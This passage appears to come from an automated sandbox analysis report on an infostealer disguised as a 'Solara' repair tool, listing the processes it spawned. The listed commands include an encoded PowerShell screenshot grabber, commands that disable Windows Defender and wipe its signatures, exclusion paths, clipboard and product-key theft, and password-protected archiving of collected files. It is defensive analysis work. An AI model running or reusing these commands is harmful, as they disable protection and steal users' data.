AdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Users\user\Desktop\cmd.exe "C:\Users\user\Desktop\cmd.exe"Jump to behavior
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe a -r -hp"blank" "C:\Users\user\AppData\Local\Temp\DBdXv.zip" *"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\cmd.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Solara has been repaired.', 0, 'Solara | Repaired', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ?.scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
